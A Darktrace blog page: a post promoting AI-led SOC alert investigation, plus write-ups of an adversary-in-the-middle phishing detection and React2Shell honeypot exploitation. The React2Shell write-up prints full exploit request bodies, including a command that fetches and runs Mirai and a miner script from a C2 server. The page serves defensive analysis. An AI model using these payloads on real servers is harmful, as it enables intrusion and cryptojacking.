Blog
/
AI
/
January 30, 2025

Reimagining Your SOC: Overcoming Alert Fatigue with AI-Led Investigations  

Reimagining your SOC Part 2/3: This blog explores how the challenges facing the modern SOC can be addressed by transforming the investigation process, unlocking efficiency and scalability in SOC operations with AI.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Brittany Woodsmall
Product Marketing Manager, AI & Attack Surface
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
30
Jan 2025

The efficiency of a Security Operations Center (SOC) hinges on its ability to detect, analyze and respond to threats effectively. With advancements in AI and automation, key early SOC team metrics such as Mean Time to Detect (MTTD) have seen significant improvements:

  • 96% of defenders believing AI-powered solutions significantly boost the speed and efficiency of prevention, detection, response, and recovery.
  • Organizations leveraging AI and automation can shorten their breach lifecycle by an average of 108 days compared to those without these technologies.

While tool advances have improved performance and effectiveness in the detection phase, this has not been as beneficial to the next step of the process where initial alerts are investigated further to determine their relevance and how they relate to other activities. This is often measured with the metric Mean Time to Analysis (MTTA), although some SOC teams operate a two-level process with teams for initial triage to filter out more obviously uninteresting alerts and for more detailed analysis of the remainder. SOC teams continue to grapple with alert fatigue, overwhelmed analysts, and inefficient triage processes, preventing them from achieving the operational efficiency necessary for a high-performing SOC.

Addressing this core inefficiency requires extending AI's capabilities beyond detection to streamline and optimize the following investigative workflows that underpin effective analysis.

Challenges with SOC alert investigation

Detecting cyber threats is only the beginning of a much broader challenge of SOC efficiency. The real bottleneck often lies in the investigation process.

Detection tools and techniques have evolved significantly with the use of machine learning methods, improving early threat detection. However, after a detection pops up, human analysts still typically step in to evaluate the alert, gather context, and determine whether it’s a true threat or a false alarm and why. If it is a threat, further investigation must be performed to understand the full scope of what may be a much larger problem. This phase, measured by the mean time to analysis, is critical for swift incident response.

Challenges with manual alert investigation:

  • Too many alerts
  • Alerts lack context
  • Cognitive load sits with analysts
  • Insufficient talent in the industry
  • Fierce competition for experienced analysts

For many organizations, investigation is where the struggle of efficiency intensifies. Analysts face overwhelming volumes of alerts, a lack of consolidated context, and the mental strain of juggling multiple systems. With a worldwide shortage of 4 million experienced level two and three SOC analysts, the cognitive burden placed on teams is immense, often leading to alert fatigue and missed threats.

Even with advanced systems in place not all potential detections are investigated. In many cases, only a quarter of initial alerts are triaged (or analyzed). However, the issue runs deeper. Triaging occurs after detection engineering and alert tuning, which often disable many alerts that could potentially reveal true threats but are not accurate enough to justify the time and effort of the security team. This means some potential threats slip through unnoticed.

Understanding alerts in the SOC: Stopping cyber incidents is hard

Let’s take a look at the cyber-attack lifecycle and the steps involved in detecting and stopping an attack:

First we need a trace of an attack…

The attack will produce some sort of digital trace. Novel attacks, insider threats, and attacker techniques such as living-off-the-land can make attacker activities extremely hard to distinguish.

A detection is created…

Then we have to detect the trace, for example some beaconing to a rare domain. Initial detection alerts being raised underpin the MTTD (mean time to detection). Reducing this initial unseen duration is where we have seen significant improvement with modern threat detection tools.

When it comes to threat detection, the possibilities are vast. Your initial lead could come from anything: an alert about unusual network activity, a potential known malware detection, or an odd email. Once that lead comes in, it’s up to your security team to investigate further and determine if this is this a legitimate threat or a false alarm and what the context is behind the alert.

Investigation begins…

It doesn’t just stop at a detection. Typically, humans also need to look at the alert, investigate, understand, analyze, and conclude whether this is a genuine threat that needs a response. We normally measure this as MTTA (mean time to analyze).

Conducting the investigation effectively requires a high degree of skill and efficiency, as every second counts in mitigating potential damage. Security teams must analyze the available data, correlate it across multiple sources, and piece together the timeline of events to understand the full scope of the incident. This process involves navigating through vast amounts of information, identifying patterns, and discerning relevant details. All while managing the pressure of minimizing downtime and preventing further escalation.

Containment begins…

Once we confirm something as a threat, and the human team determines a response is required and understand the scope, we need to contain the incident. That's normally the MTTC (mean time to containment) and can be further split into immediate and more permanent measures.

For more about how AI-led solutions can help in the containment stage read here: Autonomous Response: Streamlining Cybersecurity and Business Operations

The challenge is not only in 1) detecting threats quickly, but also 2) triaging and investigating them rapidly and with precision, and 3) prioritizing the most critical findings to avoid missed opportunities. Effective investigation demands a combination of advanced tools, robust workflows, and the expertise to interpret and act on the insights they generate. Without these, organizations risk delaying critical containment and response efforts, leaving them vulnerable to greater impacts.

While there are further steps (remediation, and of course complete recovery) here we will focus on investigation.

Developing an AI analyst: How Darktrace replicates human investigation

Darktrace has been working on understanding the investigative process of a skilled analyst since 2017. By conducting internal research between Darktrace expert SOC analysts and machine learning engineers, we developed a formalized understanding of investigative processes. This understanding formed the basis of a multi-layered AI system that systematically investigates data, taking advantage of the speed and breadth afforded by machine systems.

With this research we found that the investigative process often revolves around iterating three key steps: hypothesis creation, data collection, and results evaluation.

All these details are crucial for an analyst to determine the nature of a potential threat. Similarly, they are integral components of our Cyber AI Analyst which is an integral component across our product suite. In doing so, Darktrace has been able to replicate the human-driven approach to investigating alerts using machine learning speed and scale.

Here’s how it works:

  • When an initial or third-party alert is triggered, the Cyber AI Analyst initiates a forensic investigation by building multiple hypotheses and gathering relevant data to confirm or refute the nature of suspicious activity, iterating as necessary, and continuously refining the original hypothesis as new data emerges throughout the investigation.
  • Using a combination of machine learning including supervised and unsupervised methods, NLP and graph theory to assess activity, this investigation engine conducts a deep analysis with incidents raised to the human team only when the behavior is deemed sufficiently concerning.
  • After classification, the incident information is organized and processed to generate the analysis summary, including the most important descriptive details, and priority classification, ensuring that critical alerts are prioritized for further action by the human-analyst team.
  • If the alert is deemed unimportant, the complete analysis process is made available to the human team so that they can see what investigation was performed and why this conclusion was drawn.
Darktrace cyber ai analyst workflow, how it works

To illustrate this via example, if a laptop is beaconing to a rare domain, the Cyber AI Analyst would create hypotheses including whether this could be command and control traffic, data exfiltration, or something else. The AI analyst then collects data, analyzes it, makes decisions, iterates, and ultimately raises a new high-level incident alert describing and detailing its findings for human analysts to review and follow up.

Learn more about Darktrace's Cyber AI Analyst

  • Cost savings: Equivalent to adding up to 30 full-time Level 2 analysts without increasing headcount
  • Minimize business risk: Takes on the busy work from human analysts and elevates a team’s overall decision making
  • Improve security outcomes: Identifies subtle, sophisticated threats through holistic investigations

Unlocking an efficient SOC

To create a mature and proactive SOC, addressing the inefficiencies in the alert investigation process is essential. By extending AI's capabilities beyond detection, SOC teams can streamline and optimize investigative workflows, reducing alert fatigue and enhancing analyst efficiency.

This holistic approach not only improves Mean Time to Analysis (MTTA) but also ensures that SOCs are well-equipped to handle the evolving threat landscape. Embracing AI augmentation and automation in every phase of threat management will pave the way for a more resilient and proactive security posture, ultimately leading to a high-performing SOC that can effectively safeguard organizational assets.

Every relevant alert is investigated

The Cyber AI Analyst is not a generative AI system, or an XDR or SEIM aggregator that simply prompts you on what to do next. It uses a multi-layered combination of many different specialized AI methods to investigate every relevant alert from across your enterprise, native, 3rd party, and manual triggers, operating at machine speed and scale. This also positively affects detection engineering and alert tuning, because it does not suffer from fatigue when presented with low accuracy but potentially valuable alerts.

Retain and improve analyst skills

Transferring most analysis processes to AI systems can risk team skills if they don't maintain or build them and if the AI doesn't explain its process. This can reduce the ability to challenge or build on AI results and cause issues if the AI is unavailable. The Cyber AI Analyst, by revealing its investigation process, data gathering, and decisions, promotes and improves these skills. Its deep understanding of cyber incidents can be used for skill training and incident response practice by simulating incidents for security teams to handle.

Create time for cyber risk reduction

Human cybersecurity professionals excel in areas that require critical thinking, strategic planning, and nuanced decision-making. With alert fatigue minimized and investigations streamlined, your analysts can avoid the tedious data collection and analysis stages and instead focus on critical decision-making tasks such as implementing recovery actions and performing threat hunting.

Stay tuned for part 3/3

Part 3/3 in the Reimagine your SOC series explores the preventative security solutions market and effective risk management strategies.

Coming soon!

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Brittany Woodsmall
Product Marketing Manager, AI & Attack Surface

More in this series

No items found.

Blog

/

Email

/

December 15, 2025

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with DarktraceDefault blog imageDefault blog image

What is an Adversary-in-the-middle (AiTM) attack?

Adversary-in-the-Middle (AiTM) attacks are a sophisticated technique often paired with phishing campaigns to steal user credentials. Unlike traditional phishing, which multi-factor authentication (MFA) increasingly mitigates, AiTM attacks leverage reverse proxy servers to intercept authentication tokens and session cookies. This allows attackers to bypass MFA entirely and hijack active sessions, stealthily maintaining access without repeated logins.

This blog examines a real-world incident detected during a Darktrace customer trial, highlighting how Darktrace / EMAILTM and Darktrace / IDENTITYTM identified the emerging compromise in a customer’s email and software-as-a-service (SaaS) environment, tracked its progression, and could have intervened at critical moments to contain the threat had Darktrace’s Autonomous Response capability been enabled.

What does an AiTM attack look like?

Inbound phishing email

Attacks typically begin with a phishing email, often originating from the compromised account of a known contact like a vendor or business partner. These emails will often contain malicious links or attachments leading to fake login pages designed to spoof legitimate login platforms, like Microsoft 365, designed to harvest user credentials.

Proxy-based credential theft and session hijacking

When a user clicks on a malicious link, they are redirected through an attacker-controlled proxy that impersonates legitimate services.  This proxy forwards login requests to Microsoft, making the login page appear legitimate. After the user successfully completes MFA, the attacker captures credentials and session tokens, enabling full account takeover without the need for reauthentication.

Follow-on attacks

Once inside, attackers will typically establish persistence through the creation of email rules or registering OAuth applications. From there, they often act on their objectives, exfiltrating sensitive data and launching additional business email compromise (BEC) campaigns. These campaigns can include fraudulent payment requests to external contacts or internal phishing designed to compromise more accounts and enable lateral movement across the organization.

Darktrace’s detection of an AiTM attack

At the end of September 2025, Darktrace detected one such example of an AiTM attack on the network of a customer trialling Darktrace / EMAIL and Darktrace / IDENTITY.

In this instance, the first indicator of compromise observed by Darktrace was the creation of a malicious email rule on one of the customer’s Office 365 accounts, suggesting the account had likely already been compromised before Darktrace was deployed for the trial.

Darktrace / IDENTITY observed the account creating a new email rule with a randomly generated name, likely to hide its presence from the legitimate account owner. The rule marked all inbound emails as read and deleted them, while ignoring any existing mail rules on the account. This rule was likely intended to conceal any replies to malicious emails the attacker had sent from the legitimate account owner and to facilitate further phishing attempts.

Darktrace’s detection of the anomalous email rule creation.
Figure 1: Darktrace’s detection of the anomalous email rule creation.

Internal and external phishing

Following the creation of the email rule, Darktrace / EMAIL observed a surge of suspicious activity on the user’s account. The account sent emails with subject lines referencing payment information to over 9,000 different external recipients within just one hour. Darktrace also identified that these emails contained a link to an unusual Google Drive endpoint, embedded in the text “download order and invoice”.

Darkrace’s detection of an unusual surge in outbound emails containing suspicious content, shortly following the creation of a new email rule.
Figure 2: Darkrace’s detection of an unusual surge in outbound emails containing suspicious content, shortly following the creation of a new email rule.
Darktrace / EMAIL’s detection of the compromised account sending over 9,000 external phishing emails, containing an unusual Google Drive link.
Figure 3: Darktrace / EMAIL’s detection of the compromised account sending over 9,000 external phishing emails, containing an unusual Google Drive link.

As Darktrace / EMAIL flagged the message with the ‘Compromise Indicators’ tag (Figure 2), it would have been held automatically if the customer had enabled default Data Loss Prevention (DLP) Action Flows in their email environment, preventing any external phishing attempts.

Figure 4: Darktrace / EMAIL’s preview of the email sent by the offending account.
Figure 4: Darktrace / EMAIL’s preview of the email sent by the offending account.

Darktrace analysis revealed that, after clicking the malicious link in the email, recipients would be redirected to a convincing landing page that closely mimicked the customer’s legitimate branding, including authentic imagery and logos, where prompted to download with a PDF named “invoice”.

Figure 5: Download and login prompts presented to recipients after following the malicious email link, shown here in safe view.

After clicking the “Download” button, users would be prompted to enter their company credentials on a page that was likely a credential-harvesting tool, designed to steal corporate login details and enable further compromise of SaaS and email accounts.

Darktrace’s Response

In this case, Darktrace’s Autonomous Response was not fully enabled across the customer’s email or SaaS environments, allowing the compromise to progress,  as observed by Darktrace here.

Despite this, Darktrace / EMAIL’s successful detection of the malicious Google Drive link in the internal phishing emails prompted it to suggest ‘Lock Link’, as a recommended action for the customer’s security team to manually apply. This action would have automatically placed the malicious link behind a warning or screening page blocking users from visiting it.

Autonomous Response suggesting locking the malicious Google Drive link sent in internal phishing emails.
Figure 6: Autonomous Response suggesting locking the malicious Google Drive link sent in internal phishing emails.

Furthermore, if active in the customer’s SaaS environment, Darktrace would likely have been able to mitigate the threat even earlier, at the point of the first unusual activity: the creation of a new email rule. Mitigative actions would have included forcing the user to log out, terminating any active sessions, and disabling the account.

Conclusion

AiTM attacks represent a significant evolution in credential theft techniques, enabling attackers to bypass MFA and hijack active sessions through reverse proxy infrastructure. In the real-world case we explored, Darktrace’s AI-driven detection identified multiple stages of the attack, from anomalous email rule creation to suspicious internal email activity, demonstrating how Autonomous Response could have contained the threat before escalation.

MFA is a critical security measure, but it is no longer a silver bullet. Attackers are increasingly targeting session tokens rather than passwords, exploiting trusted SaaS environments and internal communications to remain undetected. Behavioral AI provides a vital layer of defense by spotting subtle anomalies that traditional tools often miss

Security teams must move beyond static defenses and embrace adaptive, AI-driven solutions that can detect and respond in real time. Regularly review SaaS configurations, enforce conditional access policies, and deploy technologies that understand “normal” behavior to stop attackers before they succeed.

Credit to David Ison (Cyber Analyst), Bertille Pierron (Solutions Engineer), Ryan Traill (Analyst Content Lead)

Appendices

Models

SaaS / Anomalous New Email Rule

Tactic – Technique – Sub-Technique  

Phishing - T1566

Adversary-in-the-Middle - T1557

Continue reading
About the author
David Ison
Cyber Analyst

Blog

/

Network

/

December 15, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within HoursDefault blog imageDefault blog image

What is React2Shell?

CVE-2025-55182, also known as React2Shell is a vulnerability within React server components that allows for an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and ease of exploitability has led to threat actors opportunistically exploiting it within a matter of days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing for the monitoring of exploitation of the vulnerability in the wild.

Cloudypots is a system that enables virtual instances of vulnerable applications to be deployed in the cloud and monitored for attack. This approach allows for Darktrace to deploy high-interaction, realistic honeypots, that appear as genuine deployments of vulnerable software to attackers.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers remaining unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server with IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provided known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts, roughly every hour.

When scanning, the spreader primarily targets port 3000, which is the default port for a NEXT.js server in a default or development configuration. It is possible the attacker is avoiding port 80 and 443, as these are more likely to have reverse proxies or WAFs in front of the server, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. This allows the attacker to confirm that the server is vulnerable and fetch the user account under which the NEXT.js process is running, which is useful information for determining if a target is worth attacking.

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to deploy several payloads by using wget (or curl if wget fails) into the /dev directory and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations to regular Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.
Figure 1: Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes using ‘pkill’ that match on a specific name. It will check for and terminate:

  • xmrig
  • softirq (this also matches a system process, which it will fail to kill each invocation)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script will checks for a process named “fghgf”. If it is not running, it will retrieve hxxp://89[.]144.31.18/nuts/lc and write it to /dev/ijnegrrinje.json, as well as retrieving hxxp://89[.]144.31.18/nuts/x and writing it to /dev/fghgf. The script will the executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background, which is an XMRig miner.

The XMRig deployment script.
Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using  “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads their /proc/pid/exe path, which contains a copy of the original executable that was run. The ‘strings’ utility is run to output all valid ASCII strings found within the data and checks to see if contains either “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to the process to terminate it.

Additionally, it will run ‘ls –l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program:

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
 The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.

Darktrace observations in customer environments  

Following the public disclosure of CVE‑2025‑55182 on December, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeat infrastructure clusters, Darktrace identified a consistent kill chain involving shell‑script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoint. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement activity, attempting SMB and RDP sessions with other internal devices on the network. These chain of events appear to identify this activity to be related to the malicious campaign of the exploitation of React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign to exploit the React2Shell exploit is not particularly sophisticated, it demonstrates that attackers can rapidly prototyping new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, this serves as a clear reminder that patching vulnerabilities as soon as they are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead, and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI